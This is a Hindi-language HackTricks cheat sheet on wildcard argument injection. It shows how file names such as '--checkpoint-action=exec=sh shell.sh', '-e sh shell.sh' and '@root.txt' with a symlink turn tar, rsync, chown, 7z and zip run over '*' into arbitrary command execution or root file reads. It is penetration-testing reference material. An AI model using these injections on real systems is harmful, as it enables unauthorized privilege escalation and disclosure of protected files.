tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

chown, chmod

आप यह संकेत कर सकते हैं कि आप बाकी फाइलों के लिए कौन सा फाइल मालिक और अनुमतियाँ कॉपी करना चाहते हैं

bash
touch "--reference=/my/own/path/filename"

आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (संयुक्त हमला) का उपयोग करके शोषण कर सकते हैं।
अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।

Tar

मनमाने आदेश निष्पादित करें:

bash
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar हमला) का उपयोग करके शोषण कर सकते हैं।
अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।

Rsync

मनमाने आदेश निष्पादित करें:

bash
Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
bash
touch "-e sh shell.sh"

आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (_rsync _attack) का उपयोग करके शोषण कर सकते हैं।
अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।

7z

7z में -- का उपयोग करने पर भी * से पहले (ध्यान दें कि -- का अर्थ है कि इसके बाद का इनपुट पैरामीटर के रूप में नहीं लिया जा सकता, इसलिए इस मामले में केवल फ़ाइल पथ) आप एक मनमाना त्रुटि उत्पन्न कर सकते हैं जिससे एक फ़ाइल पढ़ी जा सके, इसलिए यदि निम्नलिखित में से कोई आदेश रूट द्वारा निष्पादित किया जा रहा है:

bash
7za a /backup/$filename.zip -t7z -snl -p$pass -- *

और आप उस फ़ोल्डर में फ़ाइलें बना सकते हैं जहाँ यह निष्पादित हो रहा है, आप फ़ाइल @root.txt और फ़ाइल root.txt बना सकते हैं जो उस फ़ाइल का symlink है जिसे आप पढ़ना चाहते हैं:

bash
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

फिर, जब 7z निष्पादित होता है, यह root.txt को एक फ़ाइल के रूप में मानता है जिसमें उन फ़ाइलों की सूची होती है जिन्हें इसे संकुचित करना चाहिए (यही @root.txt के अस्तित्व का संकेत है) और जब 7z root.txt को पढ़ता है, तो यह /file/you/want/to/read को पढ़ेगा और चूंकि इस फ़ाइल की सामग्री फ़ाइलों की सूची नहीं है, यह एक त्रुटि फेंकेगा जो सामग्री दिखाएगी।

हैकथबॉक्स से CTF के बॉक्स के लेखों में अधिक जानकारी।

ज़िप

मनमाने आदेश निष्पादित करें:

bash
zip name.zip files -T --unzip-command "sh -c whoami"

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें